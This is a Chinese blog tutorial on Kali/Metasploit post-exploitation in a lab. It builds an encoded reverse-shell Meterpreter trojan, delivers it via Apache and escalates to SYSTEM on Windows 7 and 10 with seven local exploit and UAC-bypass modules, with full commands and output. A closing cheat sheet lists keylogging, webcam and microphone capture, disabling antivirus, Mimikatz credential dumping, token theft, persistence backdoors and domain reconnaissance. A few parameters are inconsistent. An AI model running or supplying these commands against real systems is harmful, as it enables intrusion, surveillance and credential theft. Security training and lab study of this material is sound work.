SuieKa
SuieKa

Kali Liunx后渗透测试----对目标进行七种模块方式提权

大家好,我是SuieKa。
后渗透测试,在这里只阐述对目标渗透后获取普通账户权限及提升至system账号权限(提权)。

目录

  • 一、实验环境
  • 二、利用msfvenom生成木马文件供目标下载
  • 三、利用exploit/multi/handler模块攻击win10和win7
    • 1、利用exploit/windows/local/ask模块攻击win10并提权(绕过UAC方式)
    • 2、利用exploit/windows/local/bypassuac模块攻击win7并提权
    • 3、利用exploit/windows/local/bypassuac_injection模块攻击win7并提权
    • 4、利用exploit/windows/local/ms13_053_schlamperei模块攻击win7并提权
    • 5、利用exploit/windows/local/ms13_081_track_popup_menu模块攻击win7并提权
    • 6、利用exploit/windows/local/ms13_097_ie_registry_symlink模块攻击win7并提权
    • 7、利用exploit/windows/local/ppr_flatten_rec模块攻击win7并提权
  • 四、进入session会话及操作

渗透测试原理=理解图:(度娘)
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第1张图片
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第2张图片

一、实验环境

一台kali linux虚拟机:192.168.1.102

root@wangzhike:/etc# uname -srv
Linux 5.5.0-kali2-amd64 #1 SMP Debian 5.5.17-1kali1 (2020-04-21)

一台windows10虚拟机:192.168.1.104
版本:cn_windows_10_enterprise_x64
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第3张图片
一台windows 7虚拟机:192.168.1.107
版本:cn_windows_7_professional_with_sp1_vl_build_x86
(英文版和中文版都可以,其他版本我只用Windows server 2003测试过)
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第4张图片

二、利用msfvenom生成木马文件供目标下载

在这里我并没有直接将生成文件交付给目标,而是通过将文件移至apache服务目录中,使目标访问地址进行下载。

root@wangzhike:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -e x86/shikata_ga_nai -f exe -o wang.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes
Saved as: wang.exe

在这里插入图片描述
复制wang.exe木马文件到apache访问页,在kali linux上启动apache

root@wangzhike:~# cp wang.exe /var/www/html/
root@wangzhike:~# service apache2 start
root@wangzhike:~# service postgresql start

改名/var/www/html/目录中其他的测试页,避免访问出现其他画面

root@wangzhike:~# cd /var/www/html/
root@wangzhike:/var/www/html# ls
index.html  index.nginx-debian.html  wang.exe
root@wangzhike:/var/www/html# mv index.html index.html.bak
root@wangzhike:/var/www/html# mv index.nginx-debian.html index.nginx-debian.html.bak

(1)、windows 10访问:http://192.168.1.102/
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第5张图片
windows10退出杀毒软件和防火墙
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第6张图片
点击下载到桌面,不要点击运行
下载到windows10
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第7张图片
在这里插入图片描述
(2)、windows 7访问下载http://192.168.1.102/
关闭防火墙
在这里插入图片描述

Kali Liunx后渗透测试----对目标进行七种模块方式提权_第8张图片

在这里插入图片描述

三、利用exploit/multi/handler模块攻击win10和win7

因为我使用的win10是x64,有些模块是没有漏洞或者仅支持x86,所以在这里只演示exploit/windows/local/ask模块攻击win10提权,其他模块使用win7进行试验。大家可换成windows10_x86版本进行实验。

root@wangzhike:~# msfconsole -q                                                                                                 
msf5 > use exploit/multi/handler                                                                                                                           
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp                                                                                                                 
msf5 exploit(multi/handler) > set lhost 192.168.1.102
lhost => 192.168.1.102                                                                                                                                     
msf5 exploit(multi/handler) > set lport 5555                                                                                                               
lport => 5555                                                                                                                                              
msf5 exploit(multi/handler) > exploit -j

在win10点击仍要运行wang.exe
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第9张图片
点击仍要运行
kali linux获取sessions
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第10张图片
进入sessions 1会话
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第11张图片
不能获取system账户权限,提权失败

扩展,如果在生成wang.exe木马文件时,将名字改为install.exe的话使用exploit/multi/handler这个模块是可以进行提权的,如下:

Kali Liunx后渗透测试----对目标进行七种模块方式提权_第12张图片

1、利用exploit/windows/local/ask模块攻击win10并提权(绕过UAC方式)

msf5 exploit(multi/handler) > use exploit/windows/local/ask
msf5 exploit(windows/local/ask) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ask) > set lhost 192.168.1.102
lhost => 192.168.1.102
msf5 exploit(windows/local/ask) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ask) > set session 1		##利用会话
session => 2
msf5 exploit(windows/local/ask) > set filename pdf_update.exe
filename => pdf_update.exe
msf5 exploit(windows/local/ask) > exploit -j

发现windows10上弹出页面
点击“是”
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第13张图片
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第14张图片
进入会话提权
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第15张图片
提权成功

2、利用exploit/windows/local/bypassuac模块攻击win7并提权

在这里重新使用exploit/multi/handler模块建立一个会话session 3
在这里插入图片描述
win7运行wang.exe
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第16张图片
在这里插入图片描述

msf5  > use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac) > set lhost 192.168.1.102
lhost => 192.168.1.102
msf5 exploit(windows/local/bypassuac) > set lport 5555
lport => 5555
msf5 exploit(windows/local/bypassuac) > set session 3
session => 3
msf5 exploit(windows/local/bypassuac) > exploit -j
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.102:5555 
msf5 exploit(windows/local/bypassuac) > [*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (176195 bytes) to 192.168.1.107

在这里插入图片描述
提权

Kali Liunx后渗透测试----对目标进行七种模块方式提权_第17张图片

3、利用exploit/windows/local/bypassuac_injection模块攻击win7并提权

msf5  > use exploit/windows/local/bypassuac_injection
msf5 exploit(windows/local/bypassuac_injection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_injection) >  set lhost 192.168.1.102
lhost => 192.168.1.102
msf5 exploit(windows/local/bypassuac_injection) > set lport 5555
lport => 5555
msf5 exploit(windows/local/bypassuac_injection) > set session 3
session => 3
msf5 exploit(windows/local/bypassuac_injection) > exploit -j
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.102:5555 
msf5 exploit(windows/local/bypassuac_injection) > [+] Windows 7 (6.1 Build 7601, Service Pack 1). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[+] Successfully injected payload in to process: 4588

Kali Liunx后渗透测试----对目标进行七种模块方式提权_第18张图片
提权
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第19张图片

4、利用exploit/windows/local/ms13_053_schlamperei模块攻击win7并提权

msf5  >use exploit/windows/local/ms13_053_schlamperei
msf5 exploit(windows/local/ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms13_053_schlamperei) >  set lhost 192.168.1.102
lhost => 192.168.1.102
msf5 exploit(windows/local/ms13_053_schlamperei) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ms13_053_schlamperei) > set session 3
session => 3
msf5 exploit(windows/local/ms13_053_schlamperei) > exploit -j
[*] Exploit running as background job 13.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.102:5555 
msf5 exploit(windows/local/ms13_053_schlamperei) > [*] Launching notepad to host the exploit...
[+] Process 2688 launched.
[*] Reflectively injecting the exploit DLL into 2688...
[*] Injecting exploit into 2688...
[*] Found winlogon.exe with PID 404
[*] Sending stage (176195 bytes) to 192.168.1.107
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell

在这里插入图片描述
提权
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第20张图片
直接是system权限

5、利用exploit/windows/local/ms13_081_track_popup_menu模块攻击win7并提权

msf5  > use exploit/windows/local/ms13_081_track_popup_menu
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms13_081_track_popup_menu) >  set lhost 192.168.1.102
lhost => 192.168.1.102
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 3
session => 3
msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit -j
[*] Exploit running as background job 14.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.102:5555 
msf5 exploit(windows/local/ms13_081_track_popup_menu) > [*] Launching notepad to host the exploit...
[+] Process 3008 launched.
[*] Reflectively injecting the exploit DLL into 3008...
[*] Injecting exploit into 3008...
[*] Exploit injected. Injecting payload into 3008...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

在这里插入图片描述
提权
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第21张图片
这个模块一样,直接是SYSTEM权限

6、利用exploit/windows/local/ms13_097_ie_registry_symlink模块攻击win7并提权

此模块我在win7中文版没有做成功,和其他模块设置上面优点不一样,在英文版可以

msf5  > use exploit/windows/local/ms13_097_ie_registry_symlink
msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > set lhost 192.168.1.102
lhost => 192.168.1.102
msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > set uripath /
uripath => /
msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > set session 3
session => 3
msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > exploit -j
[*] Exploit running as background job 15.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.102:5555 
msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > [*] Running module against WANGZHIKE-PC
[-] Exploit aborted due to failure: not-vulnerable: Not running inside an Internet Explorer process

失败原因
对浏览器IE有要求
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第22张图片

7、利用exploit/windows/local/ppr_flatten_rec模块攻击win7并提权

msf5  > use exploit/windows/local/ppr_flatten_rec
msf5 exploit(windows/local/ppr_flatten_rec) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ppr_flatten_rec) >  set lhost 192.168.1.102
lhost => 192.168.1.102
msf5 exploit(windows/local/ppr_flatten_rec) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ppr_flatten_rec) > set session 3
session => 3
msf5 exploit(windows/local/ppr_flatten_rec) > exploit -j
[*] Exploit running as background job 16.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.102:5555 
msf5 exploit(windows/local/ppr_flatten_rec) > [*] Launching notepad to host the exploit...
[+] Process 3016 launched.
[*] Reflectively injecting the exploit DLL into 3016...
[*] Injecting exploit into 3016 ...
[*] Exploit injected. Injecting payload into 3016...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...

在这里插入图片描述
提权
Kali Liunx后渗透测试----对目标进行七种模块方式提权_第23张图片

四、进入session会话及操作

shell之后:

shell 			进入目标shell
sysinfo			获取系统信息
run post/windows/gather/checkvm        查看目标是否允许在虚拟机
idletime        最近运行的时间
route        	查看目录完整网络
getuid        	当前用户名
run post/windows/manage/killav        关闭杀毒软件
run post/windows/manage/enable_rdp    开启3389
run post/windows/manage/autoroute    目标子网情况
background    	隐藏后台
route add    	添加路由
route    print	查看
run post/windows/gather/enum_logged_on_users    	列举当前有多少用户登录过目标主机
run post/windows/gather/enum_applocations        	列举安装在目标主机上
run post/windows/gather/credentials/windows_autologin    抓取自动登录的用户名密码
load espia   screengrad    抓取此时屏幕截图
webcam_snap    	拍照
keyscan_start:	开始键盘记录
keyscan_dump:	下载键盘记录
keyscan_stop:	结束键盘记录
record_mic:	录制声音(如果目标主机上有话筒的话)
webcam_chat:	查看摄像头接口
webcam_list:	查看摄像头列表
webcam_stream:	获取摄像头视频
run vnc:		开启远程桌面

文件系统命令:

pwd    	目标主机当前处于哪个目录
rmdir 	受害者系统上删除目录
mkdir 	在受害者系统上的创建目录
cat 	读取并输出到标准输出文件的内容
cd 		更改目录对受害人
del 	删除文件对受害人
edit	用 vim编辑文件
getlwd	打印本地目录
getwd	打印工作目录
lcd 	更改本地目录
lpwd 	打印本地目录
ls 		列出在当前目录中的文件列表
rm 		删除文件
ps   	获取进程
getpid  shell的进程号
migrate 迁移
search -f *.txt -d c:\   		搜索c盘下所有txt文件
download    c:\test.txt /root 	下载到本机
upload    /root/text.txt c:    	上传
run post/windows/manage/migrate 自动迁移

权限提升:

whoami/groups   查看当前权限
getuid    		查看当前权限
getsystem    	尝试提权
systeminfo    	查看补丁
使用wmic		列出安装的补丁

令牌窃取:

use incognito
	list_token -u 列出token
    	impersonate_token  +上述列出的有效令牌    假冒令牌攻击(需要两个\\)
成功后运行shell

Hash攻击:

 	1.使用hashdump 抓取密码
    非SYSTEM运行时会失败
    run windows/gather/smart_hashdump    导出域所有用户(windows7.开启UAC会导致失败)
    2.Quarks    PwDump
    3.windows credentials Editor(WCE)
        上传wce到目标。找到文件 wce -w
    4.Mimikatz(管理员)
    load Mimikatz       加载    
    msv        抓取Hash
    kerberos    抓取系统票据
    wdigest        获取系统账户信息
    mimikatz_command -f samdump::hashed    抓取hash
    mimikatz_command -f handle::list  查看进程
    mimikatz_command -f service::list  windows 服务
    mimikatz_command -f crypto::listProviders  查看系统证书
    支持PowerShell调用(Invoke-Mimikatz)

后门:

  	1.Cymothoa:
        cymothoa -p 982 -s 1 -y 4444    选择PID为982的进程为宿主进程,使用第一类Shellcode,指定反弹端口4444
        nc -nvv 目标主机 4444    使用nc进行连接
    2.Persistence:
        run persistence -A -S -U -i 60 -p 4321 -r 目标主机
            A :自动启动payload程序
            S :系统启动时自动加载
            U :用户登录时自动启动
            X :开机时自动加载
            i :回连的时间间隔
            P :监听反向连接端口号
            r :目标主机

Web 后门:

msf中使用generate生成

内网渗透:
信息收集:

net user /domain : 查看域用户
net view /domain :    查看有几个域
net view /domain :xxx    查看域内主机
net group /domain  : 查看域里面的组
net group "domain computers" /domain 查看域内所有的主机名
net group "domain admins " /domain 查看域管理员
net group "domain controllers" /domain 查看域控制器
net group "enterprise admins" /domain 查看企业管理器
nettime /domain 查看时间服务器

部分是摘抄的百度,收集到此,希望对大家学习有帮助

你可能感兴趣的:(linux实战,网络安全)

  • 计算机木马详细编写思路 小熊同学哦 php开发语言木马木马思路
    导语:计算机木马(ComputerTrojan)是一种恶意软件,通过欺骗用户从而获取系统控制权限,给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险,但是了解它的工作原理与编写思路,对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路,以及如何复杂化挑战,以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木
  • 信息系统安全相关概念(下) YuanDaima2048 基础概念课程笔记安全
    文章总览:YuanDaiMa2048博客文章总览上篇指路:信息系统安全相关概念(上)信息系统安全相关概念[下]信息系统风险评估安全风险评估信息系统等级保护网络安全法等级保护等级保护工作流程环境安全信息系统风险评估安全风险评估对信息系统整体安全态势的感知和对重大安全事件的预警,实现“事前能预防,事中能控制,事后能处理”。安全风险组成的四要素:信息系统资产(Asset)信息系统脆弱性(Vulnerab
  • 使用游戏盾就可以保证游戏不被攻击吗? 德迅云安全小李 游戏网络服务器安全网络安全
    游戏服务器不管是个人的还是企业的,被攻击都是,很常见的,在所难免的。特别是游戏新上线时,都要承受的住哪些外来压力,玩家突然猛增,被攻击等等。如果承受不住可能会直接宣布游戏倒闭。这里我们一起来说说怎么用游戏盾防御游戏服务器。首先我们要了解的一点是,什么是"游戏盾"游戏盾是针对游戏行业所推出的高度可定制的网络安全解决方案,除了能针对大型DDoS攻击(T级别)进行有效防御外,还能彻底解决游戏行业特有的T
  • 构建常态化安全防线:XDR的态势感知与自动化响应机制 安胜ANSCEN 网络安全运维威胁分析自动化响应网络安全常态化安全运营
    当前,网络安全威胁日益复杂多变,企业正面临前所未有的严峻挑战。为有效应对这些挑战,态势感知与自动化响应机制在提升网络安全运营效率与防御效果中扮演着至关重要的角色。它们能够实时监测网络状态,智能分析潜在威胁,并在发现异常时立即触发自动化响应流程,从而迅速遏制安全风险,保障企业数字资产的安全。态势感知网络安全的“预警雷达”态势感知,作为网络安全运营的核心组件,犹如一张无形的“预警雷达”,全面监测网络环
  • 【网络安全】漏洞挖掘:php代码审计 秋说 网络安全phpweb安全漏洞挖掘
    未经许可,不得转载。文章目录正文正文在应用程序中,通过一个JavaScript注释发现了一个备份ZIP文件。解压后,获取了应用程序的代码,其中包含如下代码片段:代码首先检查变量$action是否等于'convert',如果是,则继续执行。随后对传入的变量$data使用trim()函数去除两端空白字符,并使用eval()函数执行$data的内容。显然,代码对$data没有进行任何过滤或验证,因此可以
  • 【网络安全 | 代码审计】JFinal之DenyAccessJsp绕过 秋说 网络安全web安全java代码审计漏洞挖掘
    未经许可,不得转载。文章目录前言代码审计推理绕过Tomcat解析JSP总结概念验证阐发前言JFinal是一个基于Java的轻量级MVC框架,用于快速构建Web应用程序。它的设计理念是追求极简、灵活、高效,旨在提高开发效率,减少冗余代码的编写,适合中小型项目以及对性能有较高要求的项目。在较新的JFinal版本中,默认情况下无法直接通过浏览器地址栏输入.jsp文件名来访问对应的JSP文件。也就是说,主
  • 为什么需要DDos高防服务器呢? 666IDCaaa ddos服务器网络
    在当今信息化快速发展的时代,网络安全问题显得尤为重要。DDoS攻击是一种耗尽系统资源的攻击方式,可以导致正常服务请求无法得到响应。这种攻击不仅影响用户体验,还可能导致企业声誉受损、经济损失以及客户流失等严重后果。因此,选择有效的DDoS高防服务对于保护网络安全至关重要。DDoS高防服务可以通过云端清洗集群、数据库监控牵引系统等技术进行有效的削弱。这些技术能够识别并过滤恶意流量,确保正常用户能够顺利
  • 都2024年了,还在问网络安全怎么入门,气得我当场脑血栓发作 网安大师兄 web安全网络安全网络安全学习
    前言本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。正题首先,在准备进入这个行业之前,我们要问一下我们的内心,工作千千万,为什么要想进入这个行业?相信每个人的答案都不一样,有的人会说,这个行业整体上比其他行业赚钱多,有的人会说特别喜欢技术,想钻研一
  • 流量牵引技术与传统防火墙的区别 666IDCaaa ddos
    在网络安全领域,流量牵引技术和传统防火墙都起着重要的作用,但它们在很多方面存在着明显的区别。一、工作原理不同传统防火墙主要是通过设置访问控制规则来过滤网络流量。它基于预先设定的策略,对进入和离开网络的数据包进行检查,根据源地址、目的地址、端口号等信息决定是否允许数据包通过。例如,企业可以设置防火墙规则,只允许特定IP地址的设备访问内部网络资源,或者禁止某些端口的流量进入,以防止潜在的攻击。而流量牵
  • 网络安全测评技术与标准 坚持可信 信息安全web安全网络安全
    网络安全测评是评估信息系统、网络和应用程序的安全性,以发现潜在的漏洞和威胁,并确保系统符合安全标准和政策的过程。以下是常见的网络安全测评类型:1.渗透测试(PenetrationTesting)描述:通过模拟真实的攻击,评估系统、网络和应用程序的安全性,识别和修复漏洞。目标:发现系统中的安全漏洞,评估其可能被利用的风险。方法:黑盒测试:测试人员没有系统内部信息,模拟外部攻击者。白盒测试:测试人员拥
  • 2021国家开放大学计算机网络安全技术形成性考核五 chaoliang.top 国开试题网络安全网络安全
    本人还会继续更新其他国家开放大学的试题,请大家多多关注,如果有什么建议,还希望大家提出来,本人也好完善本人在测试答案的时候发现,本章考试回顾结果中明明选对了答案,但是提示错误的情况,并且该题没有提示正确答案,这种情况应该是国开试题出现bug导致,请大家不要担心,如果有追求完美的同学,多答几次,可能就会避开这种题,因为出题是随机的。1.SQL注入一般可通过网页表单直接输入选择多项:对错正确答案:对2
  • 如何提高网络安全意识 亿林网络安全事业部 网络web安全安全
    提升网络安全意识的方法提升网络安全意识是个人和企业都需要重视的问题。以下是一些有效的方法:加强教育和培训:通过参加网络安全培训课程,学习识别网络攻击的常见迹象、安全密码的设置、不点击可疑链接等知识。建立网络安全政策:制定个人网络安全规则,如定期更改密码、不在公共网络上进行敏感操作等。定期更新系统:保持操作系统和软件程序的最新状态,及时修补安全漏洞。加强网络防护:使用防火墙、反病毒软件、入侵检测系统
  • 学习笔记:FW内容安全概述 TKE_yinian
    内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护,防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性(CIA三元组)保护是信息安全的核心目标。CIA(Confidential
  • 安全隔离上网的有效途径:沙箱 Canon_YK 零信任防泄密源代码防泄密安全网络服务器网络安全web安全
    在数字化浪潮日益汹涌的今天,网络安全成为了不可忽视的重要议题。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。本文旨在深入探讨沙箱技术如何做到隔离上网,从而为用户提供一个安全、可靠的上网环境。一、沙箱技术的原理与定义沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心
  • 2024世界技能大赛某省选拔赛“网络安全项目”B模块--数据包分析(SMB流量) 落寞的魚丶 web安全安全2024世界技能大赛选拔赛网络安全B模块SMB流量分析
    2024世界技能大赛某省选拔赛“网络安全项目”B模块--数据包分析③任务二、网络数据包分析取证解析:总结:任务二、网络数据包分析取证解析:A集团的网络安全监控系统发现有恶意攻击者对集团官方网站进行攻击,并抓取了部分可疑流量包。请您根据捕捉到的流量包,搜寻出网络攻击线索,并分析黑客的恶意行为。本任务素材清单:捕获的网络数据包文件(*.pcap)请按答题卡的要求完成该部分的工作任务。序号任务要求11.
  • 第十二章 虚拟局域网VLAN 电脑菜鸡 计算机网络第一阶段智能路由器网络
    【基础词汇】status:状态active:活动ports:端口default:默认一、分割广播方式:物理分割:路由器逻辑分割:vlan技术二、VLAN:虚拟局域网.VLAN的优势:控制广播、增强网络安全性、简化网络管理.三、VLAN的分类.1.静态VLAN:基于端口划分.(1)指定交换机的端口属于哪个VLAN.(2)当主机连接到交换机端口上时,就被分配到了对应的VLAN中2.动态VLAN:基于M
  • AttackGen - AI 网络安全事件响应测试工具,附下载链接 白帽学子 安全工具web安全安全网络安全漏洞挖掘红队
    为了提高我们团队在安全活动中的响应效率,我关注到了一款叫AttackGen的工具,我们需要的是一个既能快速生成场景又能准确反映现实威胁的工具。在红蓝对抗中,我们经常要模拟各种攻击场景,以测试我们的防御水平。这不仅仅是为了“打”出个结果,更重要的是从中识别出潜在的弱点,并制定相应的修复策略。传统的做法往往需要我们手动构建这些攻击场景而AttackGen能够根据指定的威胁行为者组和组织的特征来自动生成
  • 网络安全(黑客)自学 白帽子凯哥 web安全安全网络安全服务器网络
    一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一
  • 网络安全学习路线图(2024版详解) 白帽子008 web安全学习安全网络安全运维
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • 云服务器如何预防黑客攻击? 云安全范德彪 网络安全负载均衡ddos服务器游戏
    随着互联网科技的发展,网络安全问题日益突出,企业服务器被进犯的事情也越来越频频,怎么有用处理了中小企业DDOS进犯问题。云服务器被ddos进犯了怎么办?互联网服务器遭到大流量进犯时,用户可通过装备高防,将歹意进犯流量引向高防,对维护体系进行流量过滤清洗,再将正常流量返回服务器,确保源站正常可用。1.提高服务器防护攻击流量过大,超过服务器的防护能力,就会被打封,会出现远程不上服务器、用户掉线等情况,
  • 网络安全(黑客)——自学2024 白帽子黑客-宝哥 web安全安全嵌入式硬件网络单片机
    一、什么是网络安全网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、网络安全怎么入门安全并非孤立存在,而是建立在其计算机基础之上的应用技术。
  • 2024网络安全学习路线 非常详细 推荐学习 白帽黑客-晨哥 web安全学习安全数据库php
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊,学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间,光语言都有几门,有些人会倒在学习linux系统及命令的路上,更多的人会倒在学习语言上;2、知识点掌握程度不清楚对于网络安全基础内容,很多人不清楚需要学到什么程度,囫囵吞枣,导致在基础上花费太多时间;看到很多小伙伴,买了HTML,PHP,数据库,计算机
  • 入门网络安全工程师要学习哪些内容 白帽黑客2659 web安全学习安全网安入门网络安全
    大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对网络安全工程师还是不了解,不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和渗透测试工程师不一样,如果你想成为安全开发工程师,学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
  • 【网络安全】漏洞挖掘之CVE-2019-9670+检测工具 秋说 网络安全web安全漏洞挖掘CVE
    未经许可,不得转载。文章目录漏洞介绍正文工具漏洞介绍CVE-2019-9670是一个与ZimbraCollaborationSuite(ZCS)相关的严重漏洞。ZCS中的AutoDiscover服务存在不正确的XML解析处理,该漏洞可被利用来注入恶意XML代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行(RCE)。Zimbra]>
  • 为什么说千万别学网络安全专业? 小杰的网工专栏 web安全网络安全
    前言很多人说千万别学网络安全专业的原因是因为网络安全专业学习的课程非常难。就业要求高。很多同学在大学开始接触网络空间安全专业时,才发现:对于自己来说,网络空间安全专业相关的课程学习难度有点高。为什么说千万别学网络安全专业的原因小编看来网络安全专业是很好的专业,前景很好。但是很多人说千万别学网络安全专业主要有以下原因:1、网络安全专业大多需要的是高端技术人才。国家需要的是专业水平在前1%技术大牛,简
  • 程序员下班以后做什么副业合适?_程序员下班需要学什么 网络安全乔妮娜 网络安全web安全安全职场和发展人工智能
    我就是一个最普通的网络安全工程师,出道快10年了,不出意外地遭遇到瓶颈期,但是凭技术在各大平台挖漏洞副业,硬是妥妥扛过来了。因为对于程序员来讲,这是个试错成本很低、事半功倍的选择。编程技能是一种强大生产力,决定程序员是一个高薪职业,同时由于技术迭代太快,决定程序员也是一种高风险职业,不仅有学习门槛,还有黄金时间,过期产生不了过多价值,稍不留神就被淘汰,所以35岁危机是众多程序员的梦魇,如何化解?惟
  • 网络安全要点总结 大嘴巴子 计算机网络web安全安全
    1.入侵检测与防御:1)入侵检测与系统IDS(intrusiondetectionsystem):防火墙之后的第二道闸门;IDS的部署:采用镜像端口或者集线器方式;部署在:服务器交换机上,internet接入路由器后面的第一台交换机上;IRSintrusionresponsesystem入侵响应系统:2).IPS(intrusionpreventionsystem):入侵防御系统;检测并中断;检测
  • 网络安全的相关比赛有哪些?需要掌握哪些必备技能? 网安学习 web安全安全网络安全的相关比赛有哪
    01、CTF(夺旗赛)这是一种最常见的网络安全竞技形式,要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战,获取标志(flag)并提交得分。通过举办CTF来培养网络安全人才,已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛,线上赛通常是解题模式(Jeopardy),线下赛通常是攻防模式(Attack-Defense)。CTF赛事的代表性线下赛事
